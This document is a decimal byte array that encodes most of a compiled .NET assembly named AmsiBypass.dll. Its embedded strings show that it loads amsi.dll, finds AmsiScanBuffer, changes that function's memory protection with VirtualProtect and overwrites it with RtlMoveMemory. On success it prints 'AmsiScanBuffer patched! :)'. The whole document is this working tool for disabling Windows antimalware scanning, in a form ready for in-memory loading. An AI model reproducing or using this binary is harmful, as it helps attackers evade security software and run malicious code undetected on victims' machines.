0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 32, 0, 0, 72, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 46, 116, 101, 120, 116, 0, 0, 0, 108, 12, 0, 0, 0, 32, 0, 0, 0, 14, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 96, 
46, 114, 115, 114, 99, 0, 0, 0, 48, 3, 0, 0, 0, 64, 0, 0, 0, 4, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 64, 46, 114, 101, 108, 111, 99, 0, 0, 12, 0, 0, 0, 0, 96, 0, 0, 0, 2, 0, 0, 0, 20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 63, 44, 0, 0, 0, 0, 0, 0, 72, 0, 0, 0, 2, 0, 5, 0, 64, 33, 0, 0, 236, 9, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 19, 48, 4, 0, 217, 0, 0, 0, 1, 0, 0, 17, 0, 114, 1, 0, 0, 112, 40, 1, 0, 0, 6, 10, 6, 126, 12, 0, 0, 10, 40, 13, 0, 0, 10, 19, 6, 17, 6, 44, 20, 0, 114, 19, 0, 0, 112, 40, 14, 0, 0, 10, 0, 23, 19, 7, 56, 165, 0, 0, 0, 6, 114, 107, 0, 0, 112, 40, 2, 0, 0, 6, 11, 7, 126, 12, 0, 0, 10, 40, 13, 0, 0, 10, 19, 8, 17, 8, 44, 17, 0, 114, 137, 0, 0, 112, 40, 14, 0, 0, 10, 0, 23, 19, 7, 43, 119, 26, 106, 40, 15, 0, 0, 10, 12, 22, 13, 7, 8, 31, 64, 18, 3, 40, 3, 0, 0, 6, 22, 254, 1, 19, 9, 17, 9, 44, 17, 0, 114, 255, 0, 0, 112, 40, 14, 0, 0, 10, 0, 23, 19, 7, 43, 72, 25, 141, 18, 0, 0, 1, 37, 208, 1, 0, 0, 4, 40, 16, 0, 0, 10, 19, 4, 25, 40, 17, 0, 0, 10, 19, 5, 17, 4, 22, 17, 5, 25, 40, 18, 0, 0, 10, 0, 7, 31, 27, 40, 19, 0, 0, 10, 17, 5, 25, 40, 4, 0, 0, 6, 0, 114, 117, 1, 0, 112, 40, 14, 0, 0, 10, 0, 22, 19, 7, 43, 0, 17, 7, 42, 34, 2, 40, 20, 0, 0, 10, 0, 42, 0, 0, 66, 83, 74, 66, 1, 0, 1, 0, 0, 0, 0, 0, 12, 0, 0, 0, 118, 52, 46, 48, 46, 51, 48, 51, 49, 57, 0, 0, 0, 0, 5, 0, 108, 0, 0, 0, 212, 2, 0, 0, 35, 126, 0, 0, 64, 3, 0, 0, 176, 3, 0, 0, 35, 83, 116, 114, 105, 110, 103, 115, 0, 0, 0, 0, 240, 6, 0, 0, 204, 1, 0, 0, 35, 85, 83, 0, 188, 8, 0, 0, 16, 0, 0, 0, 35, 71, 85, 73, 68, 0, 0, 0, 204, 8, 0, 0, 32, 1, 0, 0, 35, 66, 108, 111, 98, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 1, 87, 149, 2, 52, 9, 2, 0, 0, 0, 250, 1, 51, 0, 22, 0, 0, 1, 0, 0, 0, 22, 0, 0, 0, 4, 0, 0, 0, 1, 0, 0, 0, 6, 0, 0, 0, 10, 0, 0, 0, 20, 0, 0, 0, 11, 0, 0, 
0, 1, 0, 0, 0, 1, 0, 0, 0, 2, 0, 0, 0, 4, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 85, 2, 1, 0, 0, 0, 0, 0, 6, 0, 141, 1, 206, 2, 6, 0, 223, 1, 206, 2, 6, 0, 231, 0, 156, 2, 15, 0, 238, 2, 0, 0, 6, 0, 18, 1, 14, 2, 6, 0, 198, 1, 107, 2, 6, 0, 110, 1, 107, 2, 6, 0, 43, 1, 107, 2, 6, 0, 72, 1, 107, 2, 6, 0, 173, 1, 107, 2, 6, 0, 251, 0, 107, 2, 6, 0, 48, 3, 100, 2, 6, 0, 204, 0, 206, 2, 6, 0, 194, 0, 100, 2, 6, 0, 149, 2, 100, 2, 6, 0, 154, 0, 100, 2, 6, 0, 148, 2, 100, 2, 6, 0, 253, 1, 100, 2, 6, 0, 253, 2, 206, 2, 6, 0, 125, 3, 100, 2, 6, 0, 135, 0, 100, 2, 6, 0, 64, 2, 175, 2, 0, 0, 0, 0, 38, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 16, 0, 46, 2, 16, 3, 49, 0, 1, 0, 1, 0, 0, 1, 0, 0, 47, 0, 0, 0, 49, 0, 1, 0, 7, 0, 19, 1, 0, 0, 10, 0, 0, 0, 57, 0, 2, 0, 7, 0, 51, 1, 78, 0, 91, 0, 0, 0, 0, 0, 128, 0, 150, 32, 136, 3, 95, 0, 1, 0, 0, 0, 0, 0, 128, 0, 150, 32, 23, 3, 100, 0, 2, 0, 0, 0, 0, 0, 128, 0, 150, 32, 70, 3, 106, 0, 4, 0, 0, 0, 0, 0, 128, 0, 145, 32, 151, 3, 115, 0, 8, 0, 80, 32, 0, 0, 0, 0, 150, 0, 40, 2, 122, 0, 11, 0, 53, 33, 0, 0, 0, 0, 134, 24, 142, 2, 6, 0, 11, 0, 0, 0, 1, 0, 179, 0, 0, 0, 1, 0, 162, 0, 0, 0, 2, 0, 170, 0, 0, 0, 1, 0, 38, 3, 0, 0, 2, 0, 2, 2, 0, 0, 3, 0, 85, 3, 2, 0, 4, 0, 55, 3, 0, 0, 1, 0, 110, 3, 0, 0, 2, 0, 119, 0, 0, 0, 3, 0, 9, 2, 9, 0, 142, 2, 1, 0, 17, 0, 142, 2, 6, 0, 25, 0, 142, 2, 10, 0, 41, 0, 142, 2, 16, 0, 49, 0, 142, 2, 16, 0, 57, 0, 142, 2, 16, 0, 65, 0, 142, 2, 16, 0, 73, 0, 142, 2, 16, 0, 81, 0, 142, 2, 16, 0, 89, 0, 142, 2, 16, 0, 105, 0, 142, 2, 6, 0, 121, 0, 137, 2, 35, 0, 121, 0, 162, 3, 38, 0, 129, 0, 184, 0, 44, 0, 137, 0, 98, 3, 49, 0, 153, 0, 115, 3, 54, 0, 177, 0, 51, 2, 62, 0, 177, 0, 131, 3, 67, 0, 121, 0, 125, 2, 76, 0, 97, 0, 142, 2, 6, 0, 46, 0, 11, 0, 126, 0, 46, 0, 19, 0, 135, 0, 46, 0, 27, 0, 166, 0, 46, 0, 35, 0, 175, 0, 46, 0, 43, 0, 230, 0, 46, 0, 51, 0, 246, 0, 46, 0, 59, 0, 1, 1, 46, 0, 67, 0, 14, 1, 46, 0, 75, 0, 230, 0, 46, 0, 83, 0, 230, 0, 99, 0, 91, 0, 25, 1, 1, 0, 3, 0, 0, 0, 
4, 0, 21, 0, 1, 0, 72, 2, 0, 1, 3, 0, 136, 3, 1, 0, 0, 1, 5, 0, 23, 3, 1, 0, 0, 1, 7, 0, 70, 3, 1, 0, 0, 1, 9, 0, 148, 3, 2, 0, 100, 44, 0, 0, 1, 0, 4, 128, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 3, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 82, 0, 123, 0, 0, 0, 0, 0, 4, 0, 3, 0, 0, 0, 0, 0, 0, 107, 101, 114, 110, 101, 108, 51, 50, 0, 95, 95, 83, 116, 97, 116, 105, 99, 65, 114, 114, 97, 121, 73, 110, 105, 116, 84, 121, 112, 101, 83, 105, 122, 101, 61, 51, 0, 60, 77, 111, 100, 117, 108, 101, 62, 0, 60, 80, 114, 105, 118, 97, 116, 101, 73, 109, 112, 108, 101, 109, 101, 110, 116, 97, 116, 105, 111, 110, 68, 101, 116, 97, 105, 108, 115, 62, 0, 53, 49, 67, 65, 70, 66, 52, 56, 49, 51, 57, 66, 48, 50, 69, 48, 54, 49, 68, 52, 57, 49, 57, 67, 53, 49, 55, 54, 54, 50, 49, 66, 70, 56, 55, 68, 65, 67, 69, 68, 0, 115, 114, 99, 0, 110, 101, 116, 115, 116, 97, 110, 100, 97, 114, 100, 0, 82, 117, 110, 116, 105, 109, 101, 70, 105, 101, 108, 100, 72, 97, 110, 100, 108, 101, 0, 67, 111, 110, 115, 111, 108, 101, 0, 104, 77, 111, 100, 117, 108, 101, 0, 112, 114, 111, 99, 78, 97, 109, 101, 0, 110, 97, 109, 101, 0, 87, 114, 105, 116, 101, 76, 105, 110, 101, 0, 86, 97, 108, 117, 101, 84, 121, 112, 101, 0, 67, 111, 109, 112, 105, 108, 101, 114, 71, 101, 110, 101, 114, 97, 116, 101, 100, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 68, 101, 98, 117, 103, 103, 97, 98, 108, 101, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 84, 105, 116, 108, 101, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 84, 97, 114, 103, 101, 116, 70, 114, 97, 109, 101, 119, 111, 114, 107, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 70, 105, 108, 101, 86, 101, 114, 115, 105, 111, 110, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 73, 110, 102, 111, 114, 109, 97, 116, 105, 111, 110, 97, 108, 86, 101, 114, 115, 105, 111, 110, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 
98, 108, 121, 67, 111, 110, 102, 105, 103, 117, 114, 97, 116, 105, 111, 110, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 67, 111, 109, 112, 105, 108, 97, 116, 105, 111, 110, 82, 101, 108, 97, 120, 97, 116, 105, 111, 110, 115, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 80, 114, 111, 100, 117, 99, 116, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 67, 111, 109, 112, 97, 110, 121, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 82, 117, 110, 116, 105, 109, 101, 67, 111, 109, 112, 97, 116, 105, 98, 105, 108, 105, 116, 121, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 66, 121, 116, 101, 0, 100, 119, 83, 105, 122, 101, 0, 115, 105, 122, 101, 0, 83, 121, 115, 116, 101, 109, 46, 82, 117, 110, 116, 105, 109, 101, 46, 86, 101, 114, 115, 105, 111, 110, 105, 110, 103, 0, 80, 97, 116, 99, 104, 0, 65, 109, 115, 105, 0, 65, 108, 108, 111, 99, 72, 71, 108, 111, 98, 97, 108, 0, 77, 97, 114, 115, 104, 97, 108, 0, 107, 101, 114, 110, 101, 108, 51, 50, 46, 100, 108, 108, 0, 65, 109, 115, 105, 66, 121, 112, 97, 115, 115, 46, 100, 108, 108, 0, 83, 121, 115, 116, 101, 109, 0, 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 0, 111, 112, 95, 65, 100, 100, 105, 116, 105, 111, 110, 0, 90, 101, 114, 111, 0, 46, 99, 116, 111, 114, 0, 85, 73, 110, 116, 80, 116, 114, 0, 83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 0, 83, 121, 115, 116, 101, 109, 46, 82, 117, 110, 116, 105, 109, 101, 46, 73, 110, 116, 101, 114, 111, 112, 83, 101, 114, 118, 105, 99, 101, 115, 0, 83, 121, 115, 116, 101, 109, 46, 82, 117, 110, 116, 105, 109, 101, 46, 67, 111, 109, 112, 105, 108, 101, 114, 83, 101, 114, 118, 105, 99, 101, 115, 0, 68, 101, 98, 117, 103, 103, 105, 110, 103, 77, 111, 100, 101, 115, 0, 82, 117, 110, 116, 105, 109, 101, 72, 101, 108, 112, 101, 114, 115, 0, 65, 109, 115, 105, 66, 121, 112, 97, 115, 115, 0, 71, 101, 116, 80, 114, 111, 99, 65, 100, 100, 114, 
101, 115, 115, 0, 108, 112, 65, 100, 100, 114, 101, 115, 115, 0, 79, 98, 106, 101, 99, 116, 0, 108, 112, 102, 108, 79, 108, 100, 80, 114, 111, 116, 101, 99, 116, 0, 86, 105, 114, 116, 117, 97, 108, 80, 114, 111, 116, 101, 99, 116, 0, 102, 108, 78, 101, 119, 80, 114, 111, 116, 101, 99, 116, 0, 111, 112, 95, 69, 120, 112, 108, 105, 99, 105, 116, 0, 100, 101, 115, 116, 0, 73, 110, 105, 116, 105, 97, 108, 105, 122, 101, 65, 114, 114, 97, 121, 0, 67, 111, 112, 121, 0, 76, 111, 97, 100, 76, 105, 98, 114, 97, 114, 121, 0, 82, 116, 108, 77, 111, 118, 101, 77, 101, 109, 111, 114, 121, 0, 111, 112, 95, 69, 113, 117, 97, 108, 105, 116, 121, 0, 0, 0, 0, 17, 97, 0, 109, 0, 115, 0, 105, 0, 46, 0, 100, 0, 108, 0, 108, 0, 0, 87, 69, 0, 82, 0, 82, 0, 79, 0, 82, 0, 58, 0, 32, 0, 67, 0, 111, 0, 117, 0, 108, 0, 100, 0, 32, 0, 110, 0, 111, 0, 116, 0, 32, 0, 114, 0, 101, 0, 116, 0, 114, 0, 105, 0, 101, 0, 118, 0, 101, 0, 32, 0, 97, 0, 109, 0, 115, 0, 105, 0, 46, 0, 100, 0, 108, 0, 108, 0, 32, 0, 112, 0, 111, 0, 105, 0, 110, 0, 116, 0, 101, 0, 114, 0, 33, 0, 0, 29, 65, 0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 0, 117, 69, 0, 82, 0, 82, 0, 79, 0, 82, 0, 58, 0, 32, 0, 67, 0, 111, 0, 117, 0, 108, 0, 100, 0, 32, 0, 110, 0, 111, 0, 116, 0, 32, 0, 114, 0, 101, 0, 116, 0, 114, 0, 105, 0, 101, 0, 118, 0, 101, 0, 32, 0, 65, 0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 32, 0, 102, 0, 117, 0, 110, 0, 99, 0, 116, 0, 105, 0, 111, 0, 110, 0, 32, 0, 112, 0, 111, 0, 105, 0, 110, 0, 116, 0, 101, 0, 114, 0, 33, 0, 0, 117, 69, 0, 82, 0, 82, 0, 79, 0, 82, 0, 58, 0, 32, 0, 67, 0, 111, 0, 117, 0, 108, 0, 100, 0, 32, 0, 110, 0, 111, 0, 116, 0, 32, 0, 109, 0, 111, 0, 100, 0, 105, 0, 102, 0, 121, 0, 32, 0, 65, 0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 32, 0, 109, 0, 101, 0, 109, 0, 111, 0, 114, 0, 121, 0, 32, 0, 112, 0, 101, 0, 114, 0, 
109, 0, 105, 0, 115, 0, 115, 0, 105, 0, 111, 0, 110, 0, 115, 0, 33, 0, 0, 83, 71, 0, 114, 0, 101, 0, 97, 0, 116, 0, 32, 0, 115, 0, 117, 0, 99, 0, 99, 0, 101, 0, 115, 0, 115, 0, 46, 0, 32, 0, 65, 0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 32, 0, 112, 0, 97, 0, 116, 0, 99, 0, 104, 0, 101, 0, 100, 0, 33, 0, 32, 0, 58, 0, 41, 0, 0, 0, 0, 0, 94, 196, 134, 67, 207, 43, 76, 71, 180, 110, 209, 17, 221, 107, 164, 138, 0, 4, 32, 1, 1, 8, 3, 32, 0, 1, 5, 32, 1, 1, 17, 17, 4, 32, 1, 1, 14, 13, 7, 10, 24, 24, 25, 9, 29, 5, 24, 2, 8, 2, 2, 2, 6, 24, 5, 0, 2, 2, 24, 24, 4, 0, 1, 1, 14, 4, 0, 1, 25, 11, 7, 0, 2, 1, 18, 81, 17, 85, 4, 0, 1, 24, 8, 8, 0, 4, 1, 29, 5, 8, 24, 8, 5, 0, 2, 24, 24, 8, 8, 204, 123, 19, 255, 205, 45, 221, 81, 3, 6, 17, 16, 4, 0, 1, 24, 14, 5, 0, 2, 24, 24, 14, 8, 0, 4, 2, 24, 25, 9, 16, 9, 6, 0, 3, 1, 24, 24, 8, 3, 0, 0, 8, 8, 1, 0, 8, 0, 0, 0, 0, 0, 30, 1, 0, 1, 0, 84, 2, 22, 87, 114, 97, 112, 78, 111, 110, 69, 120, 99, 101, 112, 116, 105, 111, 110, 84, 104, 114, 111, 119, 115, 1, 8, 1, 0, 7, 1, 0, 0, 0, 0, 54, 1, 0, 25, 46, 78, 69, 84, 83, 116, 97, 110, 100, 97, 114, 100, 44, 86, 101, 114, 115, 105, 111, 110, 61, 118, 50, 46, 48, 1, 0, 84, 14, 20, 70, 114, 97, 109, 101, 119, 111, 114, 107, 68, 105, 115, 112, 108, 97, 121, 78, 97, 109, 101, 0, 15, 1, 0, 10, 65, 109, 115, 105, 66, 121, 112, 97, 115, 115, 0, 0, 10, 1, 0, 5, 68, 101, 98, 117, 103, 0, 0, 12, 1, 0, 7, 49, 46, 48, 46, 48, 46, 48, 0, 0, 10, 1, 0, 5, 49, 46, 48, 46, 48, 0, 0, 4, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 92, 168, 168, 0, 1, 77, 80, 2, 0, 0, 0, 100, 0, 0, 0, 128, 43, 0, 0, 128, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 19, 0, 0, 0, 39, 0, 0, 0, 228, 43, 0, 0, 228, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 82, 83, 68, 83, 215, 18, 206, 3, 139, 112, 185, 73, 189, 89, 99, 32, 233, 159, 0, 221, 1, 0, 0, 0, 47, 111, 112, 116, 47, 80, 114, 111, 106, 101, 99, 116, 115, 47, 65, 109, 
115, 105, 66, 121, 112, 97, 115, 115, 47, 65, 109, 115, 105, 66, 121, 112, 97, 115, 115, 47, 111, 98, 106, 47, 68, 101, 98, 117, 103, 47, 110, 101, 116, 115, 116, 97, 110, 100, 97, 114, 100, 50, 46, 48, 47, 65, 109, 115, 105, 66, 121, 112, 97, 115, 115, 46, 112, 100, 98, 0, 83, 72, 65, 50, 53, 54, 0, 215, 18, 206, 3, 139, 112, 185, 169, 125, 89, 99, 32, 233, 159, 0, 221, 32, 92, 168, 40, 54, 252, 229, 155, 150, 128, 72, 101, 126, 213, 146, 143, 51, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 77, 44, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 63, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 95, 67, 111, 114, 68, 108, 108, 77, 97, 105, 110, 0, 109, 115, 99, 111, 114, 101, 101, 46, 100, 108, 108, 0, 0, 0, 0, 0, 0, 255, 37, 0, 32, 0, 16, 49, 255, 144, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 16, 0, 0, 0, 24, 0, 0, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 48, 0, 0, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 72, 0, 0, 0, 88, 64, 0, 0, 212, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 212, 2, 52, 0, 0, 0, 86, 0, 83, 0, 95, 0, 86, 0, 69, 0, 82, 0, 83, 0, 73, 0, 79, 0, 78, 0, 95, 0, 73, 0, 78, 0, 70, 0, 79, 0, 0, 0, 0, 0, 189, 4, 239, 254, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 63, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 68, 0, 0, 0, 1, 0, 86, 0, 97, 0, 114, 0, 70, 0, 105, 0, 108, 0, 101, 0, 73, 0, 110, 0, 102, 0, 111, 0, 0, 0, 0, 0, 36, 0, 4, 0, 0, 0, 84, 0, 114, 0, 97, 0, 110, 0, 115, 0, 108, 0, 97, 0, 116, 0, 105, 0, 111, 0, 110, 0, 0, 0, 0, 0, 0, 0, 176, 4, 52, 2, 0, 0, 1, 0, 83, 0, 116, 0, 114, 0, 105, 0, 110, 0, 103, 0, 70, 0, 105, 0, 108, 0, 101, 0, 73, 0, 110, 0, 102, 0, 111, 0, 0, 0, 16, 2, 0, 0, 1, 0, 48, 0, 48, 0, 48, 0, 48, 0, 48, 0, 52, 0, 98, 0, 48, 0, 0, 0, 54, 0, 11, 0, 1, 0, 67, 0, 111, 0, 109, 0, 112, 0, 97, 0, 110, 0, 121, 0, 78, 0, 97, 0, 109, 0, 101, 0, 0, 0, 0, 0, 65, 0, 109, 0, 115, 0, 105, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 0, 0, 0, 0, 62, 0, 11, 0, 1, 0, 70, 0, 105, 0, 108, 0, 101, 0, 68, 0, 101, 0, 115, 0, 99, 0, 114, 0, 105, 0, 112, 0, 116, 0, 105, 0, 111, 0, 110, 0, 0, 0, 0, 0, 65, 0, 109, 0, 115, 0, 105, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 0, 0, 0, 0, 48, 0, 8, 0, 1, 0, 70, 0, 105, 0, 108, 0, 101, 0, 86, 0, 101, 0, 114, 0, 115, 0, 105, 0, 111, 0, 110, 0, 0, 0, 0, 0, 49, 0, 46, 0, 48, 0, 46, 0, 48, 0, 46, 0, 48, 0, 0, 0, 62, 0, 15, 0, 1, 0, 73, 0, 110, 0, 116, 0, 101, 0, 114, 0, 110, 0, 97, 0, 108, 0, 78, 0, 97, 0, 109, 0, 101, 0, 0, 0, 65, 0, 109, 0, 115, 0, 105, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 46, 0, 100, 0, 108, 0, 108, 0, 0, 0, 0, 0, 40, 0, 2, 0, 1, 0, 76, 0, 101, 0, 103, 0, 97, 0, 108, 0, 67, 0, 111, 0, 112, 0, 121, 0, 114, 0, 105, 0, 
103, 0, 104, 0, 116, 0, 0, 0, 32, 0, 0, 0, 70, 0, 15, 0, 1, 0, 79, 0, 114, 0, 105, 0, 103, 0, 105, 0, 110, 0, 97, 0, 108, 0, 70, 0, 105, 0, 108, 0, 101, 0, 110, 0, 97, 0, 109, 0, 101, 0, 0, 0, 65, 0, 109, 0, 115, 0, 105, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 46, 0, 100, 0, 108, 0, 108, 0, 0, 0, 0, 0, 54, 0, 11, 0, 1, 0, 80, 0, 114, 0, 111, 0, 100, 0, 117, 0, 99, 0, 116, 0, 78, 0, 97, 0, 109, 0, 101, 0, 0, 0, 0, 0, 65, 0, 109, 0, 115, 0, 105, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 0, 0, 0, 0, 48, 0, 6, 0, 1, 0, 80, 0, 114, 0, 111, 0, 100, 0, 117, 0, 99, 0, 116, 0, 86, 0, 101, 0, 114, 0, 115, 0, 105, 0, 111, 0, 110, 0, 0, 0, 49, 0, 46, 0, 48, 0, 46, 0, 48, 0, 0, 0, 56, 0, 8, 0, 1, 0, 65, 0, 115, 0, 115, 0, 101, 0, 109, 0, 98, 0, 108, 0, 121, 0, 32, 0, 86, 0, 101, 0, 114, 0, 115, 0, 105, 0, 111, 0, 110, 0, 0, 0, 49, 0, 46, 0, 48, 0, 46, 0, 48, 0, 46, 0, 48, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 12, 0, 0, 0, 96, 60, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
